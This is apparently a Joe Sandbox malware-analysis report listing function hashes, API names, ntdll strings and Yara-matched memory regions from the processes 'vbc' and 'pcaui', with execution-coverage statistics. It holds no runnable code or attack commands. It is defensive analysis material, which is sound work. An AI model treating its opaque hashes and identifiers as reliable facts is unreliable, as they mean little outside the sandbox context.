                                                                                                                        • Instruction ID: d4ef2d62670f7e4792d6979d23606ae770407f4058ce3ba9cb8fa09fe0bf8f4d
                                                                                                                        • Opcode Fuzzy Hash: cde7532831a82502e584d195c6f902fdec8b5948e338ee68dffc5b02f13bc4a2
                                                                                                                        • Instruction Fuzzy Hash: 2290043F31150003010DF55C07C45174057C7D53513D5C471F1055554CD735CD715131
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d774915a5c7bdd08de1a0062ef92d5c075a5e5a0c64e48345ca2275dcaf038b3
                                                                                                                        • Instruction ID: d45ca0dbf10f405065a94ca1c1b5d8ae2928d347b86f665dd1493c8a3d0470c7
                                                                                                                        • Opcode Fuzzy Hash: d774915a5c7bdd08de1a0062ef92d5c075a5e5a0c64e48345ca2275dcaf038b3
                                                                                                                        • Instruction Fuzzy Hash: 6B90022620194442D144725C4884B1F811687E1302FD5C459A4196558CC91989555721
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 46feda8f1fd62fd0f79e1d1a0f677496f9679e9bf90a6363194b1999596db209
                                                                                                                        • Instruction ID: 93531095a1dd244fa5617aa992b7df721d61b5cec7ffbbf49530298dd404e580
                                                                                                                        • Opcode Fuzzy Hash: 46feda8f1fd62fd0f79e1d1a0f677496f9679e9bf90a6363194b1999596db209
                                                                                                                        • Instruction Fuzzy Hash: E490022624150802D144715C84947174017C7D0701FD5C451A0064558D861A8A6566B1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f0af1ac9cd3daf9a048437e8c831efa77b583f3e42b7851d2c2119c6e2ae3e17
                                                                                                                        • Instruction ID: 9c27daa5f1b1cb4df5397b95d834a6f456e102c804edf0cfd578ac36371bbe4c
                                                                                                                        • Opcode Fuzzy Hash: f0af1ac9cd3daf9a048437e8c831efa77b583f3e42b7851d2c2119c6e2ae3e17
                                                                                                                        • Instruction Fuzzy Hash: D1900236202501429544725C5884A5E811687E1302BD5D855A0055558CC91889615221
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a088d10eb149952d383ab8081fce6c0f14d7a97d2d0bbcc6f9ff6fdab0a89121
                                                                                                                        • Instruction ID: 12c486d38bc85d641e4cebce990a175fff31729ef6845b72a4cbf9b72ee2bebc
                                                                                                                        • Opcode Fuzzy Hash: a088d10eb149952d383ab8081fce6c0f14d7a97d2d0bbcc6f9ff6fdab0a89121
                                                                                                                        • Instruction Fuzzy Hash: 7C90023A20150402D514715C5884656405787D0301FD5D851A046455CD865889A1A121
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 58a29bed287f78e0291bb8923858165e329e1ea4bb583483c734c7727412b616
                                                                                                                        • Instruction ID: 2badd955516fc7489a9446fbf1665fcdcee9cf5d2572af58a52ea2c7b1a06e59
                                                                                                                        • Opcode Fuzzy Hash: 58a29bed287f78e0291bb8923858165e329e1ea4bb583483c734c7727412b616
                                                                                                                        • Instruction Fuzzy Hash: 4890022624555102D154715C44846268016A7E0301FD5C461A0854598D855989556221
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                        • Instruction ID: 1dfb236e98f8bcecffd27fba41c6d95192442dafdd122e6a46f99403fdf6a817
                                                                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                        • Opcode ID: e03a2b0b8e57ac4213b4d822a58d3b86f11a63f331d74249b32336f2c4374989
                                                                                                                        • Instruction ID: 287fa56b843405254c8cd0446719d04f452201cc4b5cceb8f7fbf04059352d7c
                                                                                                                        • Opcode Fuzzy Hash: e03a2b0b8e57ac4213b4d822a58d3b86f11a63f331d74249b32336f2c4374989
                                                                                                                        • Instruction Fuzzy Hash: 91510779A04665AECB34DF5CC99097FF7FEFB44200B048859F496C76C1E6B4EA448B60
                                                                                                                        Strings
                                                                                                                        • ExecuteOptions, xrefs: 053A46A0
                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 053A4742
                                                                                                                        • Execute=1, xrefs: 053A4713
                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 053A4725
                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 053A4787
                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 053A46FC
                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 053A4655
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                        • API String ID: 0-484625025
                                                                                                                        • Opcode ID: b580f0b7f25ed4665c10affc70ed17f7a6102e4646dc6611ca121e9347ab1e80
                                                                                                                        • Instruction ID: de2f679604eb3f75d37e7ebbab1732f79f57cfa5eb2ec363aef8d9023bb1f77a
                                                                                                                        • Opcode Fuzzy Hash: b580f0b7f25ed4665c10affc70ed17f7a6102e4646dc6611ca121e9347ab1e80
                                                                                                                        • Instruction Fuzzy Hash: F0510931B002197AEF25EBA4DC89FFA77A9FF04308F4440ADE505EB190EBB19A41CB55
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                        • Instruction ID: cdb88bf40a87ec823477fe1cc190b07c4f6e9ef34205fc1fbea29d233837a827
                                                                                                                        • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                        • Instruction Fuzzy Hash: AF022571608341AFD305DF18C494AABB7E5FFC8710F21996EF9864B2A4DB31E905CB92
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldvrm
                                                                                                                        • String ID: +$-$0$0
                                                                                                                        • API String ID: 1302938615-699404926
                                                                                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                        • Instruction ID: 4714a5373c772d92111ddeb9315efb1a5e426d11a6961969945c4d30245a1d86
                                                                                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                        • Instruction Fuzzy Hash: 2781A270E0528D9EDF35CE68C8B17FEFBB6BF45350F184259D8A1A7290E77898408754
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: %%%u$[$]:%u
                                                                                                                        • API String ID: 48624451-2819853543
                                                                                                                        • Opcode ID: a8af51e073c2988e509722a322de77cb15c14080dd705c1b949697e9479084ae
                                                                                                                        • Instruction ID: 1027abc13d61abc99e3b004b26ed8fe052acbc94940dd7a5a61d0d93d6d3ae0a
                                                                                                                        • Opcode Fuzzy Hash: a8af51e073c2988e509722a322de77cb15c14080dd705c1b949697e9479084ae
                                                                                                                        • Instruction Fuzzy Hash: 642153BAE00229ABDB14DE79CC44AFFB7EDEF44640F440116F905E3240EB759A059BA1
                                                                                                                        Strings
                                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 053A02BD
                                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 053A02E7
                                                                                                                        • RTL: Re-Waiting, xrefs: 053A031E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                        • API String ID: 0-2474120054
                                                                                                                        • Opcode ID: 2498ff7709d8ca9b74b0c2f8bba705c2ff48511214b237150bbe00ec250c59de
                                                                                                                        • Instruction ID: 4a5264f60298e939dec0f334129e6db7588987e840d27269b34949141ada9c01
                                                                                                                        • Opcode Fuzzy Hash: 2498ff7709d8ca9b74b0c2f8bba705c2ff48511214b237150bbe00ec250c59de
                                                                                                                        • Instruction Fuzzy Hash: 03E1AF716087419FD729CF28C888F6AB7E5FB84324F140A19F9A68B6D0D7B4E944CB42
                                                                                                                        Strings
                                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 053A7B7F
                                                                                                                        • RTL: Resource at %p, xrefs: 053A7B8E
                                                                                                                        • RTL: Re-Waiting, xrefs: 053A7BAC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                        • API String ID: 0-871070163
                                                                                                                        • Opcode ID: 40b647334625f76e5a2e772e64c75791e73da39b6f9da660a677c25be8b3eab1
                                                                                                                        • Instruction ID: 85e42933df492c855b5c0a4b894a7d908adda60ed51ce2966ce9bd1213bb4f2d
                                                                                                                        • Opcode Fuzzy Hash: 40b647334625f76e5a2e772e64c75791e73da39b6f9da660a677c25be8b3eab1
                                                                                                                        • Instruction Fuzzy Hash: 9041B1367047029FDB24DE29CC50B6AB7E6FB88710F104A2DE956DB690DBB1E4058FA1
                                                                                                                        APIs
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 053A728C
                                                                                                                        Strings
                                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 053A7294
                                                                                                                        • RTL: Resource at %p, xrefs: 053A72A3
                                                                                                                        • RTL: Re-Waiting, xrefs: 053A72C1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                        • API String ID: 885266447-605551621
                                                                                                                        • Opcode ID: c164819fde15765d9497d0443c2f406499d369f9b5b13182cd5f2434db124c3a
                                                                                                                        • Instruction ID: f62f894da47dd31a8a56cd583a50a3765dd5f92746ff852f34c49b6552d2deca
                                                                                                                        • Opcode Fuzzy Hash: c164819fde15765d9497d0443c2f406499d369f9b5b13182cd5f2434db124c3a
                                                                                                                        • Instruction Fuzzy Hash: B2410236704606ABD721DE24CC81F66B7A6FF84710F104629F955EB640EB71E812CBD1
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: %%%u$]:%u
                                                                                                                        • API String ID: 48624451-3050659472
                                                                                                                        • Opcode ID: c89c6c745e080bb38a15b40a4d46ac788733dd4cdfee49bce749e3a4b3410c2b
                                                                                                                        • Instruction ID: f0d105dd311837e19f4b01bf2a84ae84a862e5d840773d94edcf137b5fc48502
                                                                                                                        • Opcode Fuzzy Hash: c89c6c745e080bb38a15b40a4d46ac788733dd4cdfee49bce749e3a4b3410c2b
                                                                                                                        • Instruction Fuzzy Hash: 15314176A006299EDB24DE69CC44BEFB7FCFB44610F444556F849E3240EB70AE489FA0
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldvrm
                                                                                                                        • String ID: +$-
                                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                        • Instruction ID: ca0256d94928df86883db15811a51d93af0ca9ad55df75f256de2b77d6c26b47
                                                                                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                        • Instruction Fuzzy Hash: 2B91A170F0420E9BDB34DE69C984ABEB7A6FF44320F14451AE865E76C0D7B89942CB60
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $$@
                                                                                                                        • API String ID: 0-1194432280
                                                                                                                        • Opcode ID: 093539f239edf77616c520d5d32bdb360ca4aae6006da027003d55ff71954d97
                                                                                                                        • Instruction ID: 5fabe65d88b8c647c8da7ea0b76f207f7791fc45df5700ec8d6b3dbca4f6b68b
                                                                                                                        • Opcode Fuzzy Hash: 093539f239edf77616c520d5d32bdb360ca4aae6006da027003d55ff71954d97
                                                                                                                        • Instruction Fuzzy Hash: 7B811BB6D00669DBDB35DF54CC45BEEB7B9AB08710F0041EAA919B7680D7709E84CFA0
                                                                                                                        APIs
                                                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 053BCFBD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CallFilterFunc@8
                                                                                                                        • String ID: @$@4Cw@4Cw
                                                                                                                        • API String ID: 4062629308-3101775584
                                                                                                                        • Opcode ID: ab4872df4346b3045380b7a111640a808e00d8ad80cd70a9a2a7df4527774c47
                                                                                                                        • Instruction ID: 4616abc65aebaa8092c71b6dfecec37bea176db23342df0d436a37ac9fdc899e
                                                                                                                        • Opcode Fuzzy Hash: ab4872df4346b3045380b7a111640a808e00d8ad80cd70a9a2a7df4527774c47
                                                                                                                        • Instruction Fuzzy Hash: 0641BFB1A00228DFDB21DFA5C884AEEBBB8FF44704F50486AEA15DB650D7B49801DB60

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:2.5%
                                                                                                                        Dynamic/Decrypted Code Coverage:4.3%
                                                                                                                        Signature Coverage:2.3%
                                                                                                                        Total number of Nodes:443
                                                                                                                        Total number of Limit Nodes:74

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: &Z$)#$0a$66$=]$A$C$LF$MW$Py$X,$[$]s$_n`3$`3$a)$ao$gn$m$nK$nv$s:$t$t?$td$tn$w($G$|
                                                                                                                        • API String ID: 0-31118547
                                                                                                                        • Opcode ID: bf978f7149bf0498172532c11720008597b6518bd44c95df12adbe04920d50a4
                                                                                                                        • Instruction ID: 4ef6aab2d6fb5006114b28aed6025ff35fefb8c1aa0324bf6349264377830d23
                                                                                                                        • Opcode Fuzzy Hash: bf978f7149bf0498172532c11720008597b6518bd44c95df12adbe04920d50a4
                                                                                                                        • Instruction Fuzzy Hash: C9427DB0D052698BEB24CF84C9987EDBBB1BB45308F1481DAC5897B380D7B96E84CF55
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 02D7CA04
                                                                                                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 02D7CA3F
                                                                                                                        • FindClose.KERNELBASE(?), ref: 02D7CA4A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3541575487-0
                                                                                                                        • Opcode ID: 299f0ff1c5cf853f094545c58691598bf6e6fe64b8969edb7be736c681c31176
                                                                                                                        • Instruction ID: 02b1161424b571659966f7bdbc27c7297db78d85bf6c4d553eea74984a6dd75a
                                                                                                                        • Opcode Fuzzy Hash: 299f0ff1c5cf853f094545c58691598bf6e6fe64b8969edb7be736c681c31176
                                                                                                                        • Instruction Fuzzy Hash: DF316071A10308BBDB20EBA4CC85FFE777DDB45745F14459AB509A7280EB74AE848BA0
                                                                                                                        APIs
                                                                                                                        • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02D895BE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 823142352-0
                                                                                                                        • Opcode ID: 3d70d8d9e27a0add59b9421d482b25a71217f0a204cfcef757f10121b7412aa6
                                                                                                                        • Instruction ID: b2074b490aca5c65d4a0fcd7b80bf2520392021b89a65003df0d2d5ff48957b7
                                                                                                                        • Opcode Fuzzy Hash: 3d70d8d9e27a0add59b9421d482b25a71217f0a204cfcef757f10121b7412aa6
                                                                                                                        • Instruction Fuzzy Hash: E031A1B5A15209AFCB04DF98D881EEFB7B9EF8C714F108219F919A7340D730A951CBA5
                                                                                                                        APIs
                                                                                                                        • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02D89716
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2738559852-0
                                                                                                                        • Opcode ID: 93a2cee56a1428797df3da84a8abdbe1b9a369cea57cc10243a458e0e3c02c6c
                                                                                                                        • Instruction ID: be655213dbc2319d09b34abb3730532347e7d38a2090f217b81529a9e336473e
                                                                                                                        • Opcode Fuzzy Hash: 93a2cee56a1428797df3da84a8abdbe1b9a369cea57cc10243a458e0e3c02c6c
                                                                                                                        • Instruction Fuzzy Hash: 5F3197B5A00209ABDB14DF98D881EEEB7B9EB8C714F108219F919A7340D774A911CBA5
                                                                                                                        APIs
                                                                                                                        • NtAllocateVirtualMemory.NTDLL(02D720FE,?,02D882AE,00000000,00000004,00003000,?,?,?,?,?,02D882AE,02D720FE,02D882AE,00000000), ref: 02D89A0B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2167126740-0
                                                                                                                        • Opcode ID: b2bcc8214340253df5124bb0783499fedb635cf7d8e3ae221ba737ecb91fef68
                                                                                                                        • Instruction ID: d2b651df3535a550b4a04005572f381e39c6d10d3f167ea068aa08be6124188e
                                                                                                                        • Opcode Fuzzy Hash: b2bcc8214340253df5124bb0783499fedb635cf7d8e3ae221ba737ecb91fef68
                                                                                                                        • Instruction Fuzzy Hash: D02128B5A00209AFDB14EF98D881EEFB7B9EF88700F10410AFD59A7340D770A911CBA5
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DeleteFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4033686569-0
                                                                                                                        • Opcode ID: 44476250ceff69c8a1bd10f2481759560b735b8ff55dc8cfa59ac658486d36a1
                                                                                                                        • Instruction ID: 5e6f6f8c1915c4aef10635da6883145f15014e31ff4ce772ee9215287eefe3ce
                                                                                                                        • Opcode Fuzzy Hash: 44476250ceff69c8a1bd10f2481759560b735b8ff55dc8cfa59ac658486d36a1
                                                                                                                        • Instruction Fuzzy Hash: 8311AC71600608BBD620FBA8DC41FEBB7ADEF85714F00850AF949A7380D7707A018BB5
                                                                                                                        APIs
                                                                                                                        • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02D89807
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Close
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3535843008-0
                                                                                                                        • Opcode ID: a6ce47e24ac997c0e1dd9abbf1fa8a3d5f959370d8a09260ef0fc3f9f560e904
                                                                                                                        • Instruction ID: b3ce86e3ce0fc93e524829747c8fa4bbb43678ea3a991f6b42766e3714c948bf
                                                                                                                        • Opcode Fuzzy Hash: a6ce47e24ac997c0e1dd9abbf1fa8a3d5f959370d8a09260ef0fc3f9f560e904
                                                                                                                        • Instruction Fuzzy Hash: 51E046362002047BD220BB99DC41FEB77ADDBC5714F008419FA0CAB381C671B9118BF0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: b9f0f4d06115c67e49f51c5b5044230bcb79ddf0fdc6168a1d0332630c46ca4b
